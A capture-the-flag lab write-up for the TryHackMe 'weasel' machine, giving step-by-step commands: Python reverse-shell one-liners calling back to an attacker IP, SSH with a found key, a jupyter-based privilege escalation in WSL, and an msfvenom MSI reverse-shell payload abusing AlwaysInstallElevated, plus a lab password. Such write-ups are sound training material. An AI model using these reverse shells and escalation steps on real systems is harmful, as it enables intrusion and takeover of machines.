8888

Using the token from [[Hacking/TryHackMe/weasel/445]] we can login Now logging in:
We can try running a python revshell:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.103.226",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")Now we get a shell back running penelope:
penelope.py 8000
We are actually in WSL
We might have ssh keys.
Infact it is an ssh key: 
Now trying to login:
ssh dev-datasci-lowpriv@10.10.223.102 -i id_ed25519We are in: 
Now resuming the jupyter privesc:
There isnt a file like that.
Now finding jupyter
locate jupyter
We can copy one of these:
cp /home/dev-datasci/anaconda3/bin/jupyter /home/dev-datasci/.local/bin/jupyterNow we can run jupyter console: 
Now trying the revshell command again:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.103.226",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
Now we get a shell in penelope:
penelope.py 443
We are root. Now mount c:/ drive in linux:
mount -t drvfs 'c:' /mnt/c
We can get the flag from administrator desktop. 
Method 2
Alwaysinstallelevated is turned on. 
We have credentials as well:
Craft a payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.103.226 LPORT=8000 -f msi > setup.msi runas /user:dev-datasci-lowpriv "msiexec /quiet /qn /i C:\Users\dev-datasci-lowpriv\setup.msi"Now enter the password wUqnKWqzha*W!PWrPRWi!M8faUn
Now we get an elevated shell.
Last updated
Was this helpful?